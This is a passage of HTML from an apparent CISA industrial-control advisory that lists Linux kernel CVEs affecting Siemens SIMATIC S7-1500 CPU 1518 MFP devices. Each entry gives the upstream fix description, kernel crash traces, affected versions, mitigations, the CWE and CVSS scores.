<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-68291</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: mptcp: Initialise rcv_mss before calling tcp_send_active_reset() in mptcp_do_fastclose(). syzbot reported divide-by-zero in __tcp_select_window() by MPTCP socket. [0] We had a similar issue for the bare TCP and fixed in commit 499350a5a6e7 ("tcp: initialize rcv_mss to TCP_MIN_MSS instead of 0"). Let's apply the same fix to mptcp_do_fastclose(). [0]: Oops: divide error: 0000 [#1] SMP KASAN PTI CPU: 0 UID: 0 PID: 6068 Comm: syz.0.17 Not tainted syzkaller #0 PREEMPT(full) Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/25/2025 RIP: 0010:__tcp_select_window+0x824/0x1320 net/ipv4/tcp_output.c:3336 Code: ff ff ff 44 89 f1 d3 e0 89 c1 f7 d1 41 01 cc 41 21 c4 e9 a9 00 00 00 e8 ca 49 01 f8 e9 9c 00 00 00 e8 c0 49 01 f8 44 89 e0 99 7c 24 1c 41 29 d4 48 bb 00 00 00 00 00 fc ff df e9 80 00 00 00 RSP: 0018:ffffc90003017640 EFLAGS: 00010293 RAX: 0000000000000000 RBX: 0000000000000000 RCX: ffff88807b469e40 RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000 RBP: ffffc90003017730 R08: ffff888033268143 R09: 1ffff1100664d028 R10: dffffc0000000000 R11: ffffed100664d029 R12: 0000000000000000 R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000 FS: 000055557faa0500(0000) GS:ffff888126135000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f64a1912ff8 CR3: 0000000072122000 CR4: 00000000003526f0 Call Trace: tcp_select_window net/ipv4/tcp_output.c:281 [inline] __tcp_transmit_skb+0xbc7/0x3aa0 net/ipv4/tcp_output.c:1568 tcp_transmit_skb net/ipv4/tcp_output.c:1649 [inline] tcp_send_active_reset+0x2d1/0x5b0 net/ipv4/tcp_output.c:3836 mptcp_do_fastclose+0x27e/0x380 net/mptcp/protocol.c:2793 mptcp_disconnect+0x238/0x710 net/mptcp/protocol.c:3253 mptcp_sendmsg_fastopen+0x2f8/0x580 net/mptcp/protocol.c:1776 mptcp_sendmsg+0x1774/0x1980 net/mptcp/protocol.c:1855 sock_sendmsg_nosec net/socket.c:727 [inline] __sock_sendmsg+0xe5/0x270 net/socket.c:742 __sys_sendto+0x3bd/0x520 net/socket.c:2244 __do_sys_sendto net/socket.c:2251 [inline] __se_sys_sendto net/socket.c:2247 [inline] __x64_sys_sendto+0xde/0x100 net/socket.c:2247 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xfa/0xfa0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f66e998f749 Code: ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 &lt;48&gt; 3d 01 f0 ff ff 73 01 c3 48 c7 c1 a8 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007ffff9acedb8 EFLAGS: 00000246 ORIG_RAX: 000000000000002c RAX: ffffffffffffffda RBX: 00007f66e9be5fa0 RCX: 00007f66e998f749 RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000003 RBP: 00007ffff9acee10 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000001 R13: 00007f66e9be5fa0 R14: 00007f66e9be5fa0 R15: 0000000000000006</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-68291">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/909.html">CWE-909 Missing Initialization of Resource</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-68337</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: jbd2: avoid bug_on in jbd2_journal_get_create_access() when file system corrupted There's issue when file system corrupted: ------------[ cut here ]------------ kernel BUG at fs/jbd2/transaction.c:1289! Oops: invalid opcode: 0000 [#1] SMP KASAN PTI CPU: 5 UID: 0 PID: 2031 Comm: mkdir Not tainted 6.18.0-rc1-next RIP: 0010:jbd2_journal_get_create_access+0x3b6/0x4d0 RSP: 0018:ffff888117aafa30 EFLAGS: 00010202 RAX: 0000000000000000 RBX: ffff88811a86b000 RCX: ffffffff89a63534 RDX: 1ffff110200ec602 RSI: 0000000000000004 RDI: ffff888100763010 RBP: ffff888100763000 R08: 0000000000000001 R09: ffff888100763028 R10: 0000000000000003 R11: 0000000000000000 R12: 0000000000000000 R13: ffff88812c432000 R14: ffff88812c608000 R15: ffff888120bfc000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f91d6970c99 CR3: 00000001159c4000 CR4: 00000000000006f0 Call Trace: __ext4_journal_get_create_access+0x42/0x170 ext4_getblk+0x319/0x6f0 ext4_bread+0x11/0x100 ext4_append+0x1e6/0x4a0 ext4_init_new_dir+0x145/0x1d0 ext4_mkdir+0x326/0x920 vfs_mkdir+0x45c/0x740 do_mkdirat+0x234/0x2f0 __x64_sys_mkdir+0xd6/0x120 do_syscall_64+0x5f/0xfa0 entry_SYSCALL_64_after_hwframe+0x76/0x7e The above issue occurs with us in errors=continue mode when accompanied by storage failures. There have been many inconsistencies in the file system data. In the case of file system data inconsistency, for example, if the block bitmap of a referenced block is not set, it can lead to the situation where a block being committed is allocated and used again. As a result, the following condition will not be satisfied then trigger BUG_ON. Of course, it is entirely possible to construct a problematic image that can trigger this BUG_ON through specific operations. In fact, I have constructed such an image and easily reproduced this issue. Therefore, J_ASSERT() holds true only under ideal conditions, but it may not necessarily be satisfied in exceptional scenarios. Using J_ASSERT() directly in abnormal situations would cause the system to crash, which is clearly not what we want. So here we directly trigger a JBD abort instead of immediately invoking BUG_ON.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-68337">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-68349</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: NFSv4/pNFS: Clear NFS_INO_LAYOUTCOMMIT in pnfs_mark_layout_stateid_invalid Fixes a crash when layout is null during this call stack: write_inode -&gt; nfs4_write_inode -&gt; pnfs_layoutcommit_inode pnfs_set_layoutcommit relies on the lseg refcount to keep the layout around. Need to clear NFS_INO_LAYOUTCOMMIT otherwise we might attempt to reference a null layout.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-68349">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-68363</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: bpf: Check skb-&gt;transport_header is set in bpf_skb_check_mtu The bpf_skb_check_mtu helper needs to use skb-&gt;transport_header when the BPF_MTU_CHK_SEGS flag is used: bpf_skb_check_mtu(skb, ifindex, &amp;mtu_len, 0, BPF_MTU_CHK_SEGS) The transport_header is not always set. There is a WARN_ON_ONCE report when CONFIG_DEBUG_NET is enabled + skb-&gt;gso_size is set + bpf_prog_test_run is used: WARNING: CPU: 1 PID: 2216 at ./include/linux/skbuff.h:3071 skb_gso_validate_network_len bpf_skb_check_mtu bpf_prog_3920e25740a41171_tc_chk_segs_flag # A test in the next patch bpf_test_run bpf_prog_test_run_skb For a normal ingress skb (not test_run), skb_reset_transport_header is performed but there is plan to avoid setting it as described in commit 2170a1f09148 ("net: no longer reset transport_header in __netif_receive_skb_core()"). This patch fixes the bpf helper by checking skb_transport_header_was_set(). The check is done just before skb-&gt;transport_header is used, to avoid breaking the existing bpf prog. The WARN_ON_ONCE is limited to bpf_prog_test_run, so targeting bpf-next.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-68363">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-68371</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: scsi: smartpqi: Fix device resources accessed after device removal Correct possible race conditions during device removal. Previously, a scheduled work item to reset a LUN could still execute after the device was removed, leading to use-after-free and other resource access issues. This race condition occurs because the abort handler may schedule a LUN reset concurrently with device removal via sdev_destroy(), leading to use-after-free and improper access to freed resources. - Check in the device reset handler if the device is still present in the controller's SCSI device list before running; if not, the reset is skipped. - Cancel any pending TMF work that has not started in sdev_destroy(). - Ensure device freeing in sdev_destroy() is done while holding the LUN reset mutex to avoid races with ongoing resets.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-68371">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-68724</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: crypto: asymmetric_keys - prevent overflow in asymmetric_key_generate_id Use check_add_overflow() to guard against potential integer overflows when adding the binary blob lengths and the size of an asymmetric_key_id structure and return ERR_PTR(-EOVERFLOW) accordingly. This prevents a possible buffer overflow when copying data from potentially malicious X.509 certificate fields that can be arbitrarily large, such as ASN.1 INTEGER serial numbers, issuer names, etc.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-68724">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/190.html">CWE-190 Integer Overflow or Wraparound</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-68725</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: bpf: Do not let BPF test infra emit invalid GSO types to stack Yinhao et al. reported that their fuzzer tool was able to trigger a skb_warn_bad_offload() from netif_skb_features() -&gt; gso_features_check(). When a BPF program - triggered via BPF test infra - pushes the packet to the loopback device via bpf_clone_redirect() then mentioned offload warning can be seen. GSO-related features are then rightfully disabled. We get into this situation due to convert___skb_to_skb() setting gso_segs and gso_size but not gso_type. Technically, it makes sense that this warning triggers since the GSO properties are malformed due to the gso_type. Potentially, the gso_type could be marked non-trustworthy through setting it at least to SKB_GSO_DODGY without any other specific assumptions, but that also feels wrong given we should not go further into the GSO engine in the first place. The checks were added in 121d57af308d ("gso: validate gso_type in GSO handlers") because there were malicious (syzbot) senders that combine a protocol with a non-matching gso_type. If we would want to drop such packets, gso_features_check() currently only returns feature flags via netif_skb_features(), so one location for potentially dropping such skbs could be validate_xmit_unreadable_skb(), but then otoh it would be an additional check in the fast-path for a very corner case. Given bpf_clone_redirect() is the only place where BPF test infra could emit such packets, lets reject them right there.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-68725">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-68742</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: bpf: Fix invalid prog-&gt;stats access when update_effective_progs fails Syzkaller triggers an invalid memory access issue following fault injection in update_effective_progs. The issue can be described as follows: __cgroup_bpf_detach update_effective_progs compute_effective_progs bpf_prog_array_alloc &lt;-- fault inject purge_effective_progs /* change to dummy_bpf_prog */ array-&gt;items[index] = &amp;dummy_bpf_prog.prog ---softirq start--- __do_softirq ... __cgroup_bpf_run_filter_skb __bpf_prog_run_save_cb bpf_prog_run stats = this_cpu_ptr(prog-&gt;stats) /* invalid memory access */ flags = u64_stats_update_begin_irqsave(&amp;stats-&gt;syncp) ---softirq end--- static_branch_dec(&amp;cgroup_bpf_enabled_key[atype]) The reason is that fault injection caused update_effective_progs to fail and then changed the original prog into dummy_bpf_prog.prog in purge_effective_progs. Then a softirq came, and accessing the members of dummy_bpf_prog.prog in the softirq triggers invalid mem access. To fix it, skip updating stats when stats is NULL.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-68742">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-68764</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: NFS: Automounted filesystems should inherit ro,noexec,nodev,sync flags When a filesystem is being automounted, it needs to preserve the user-set superblock mount options, such as the "ro" flag.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-68764">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
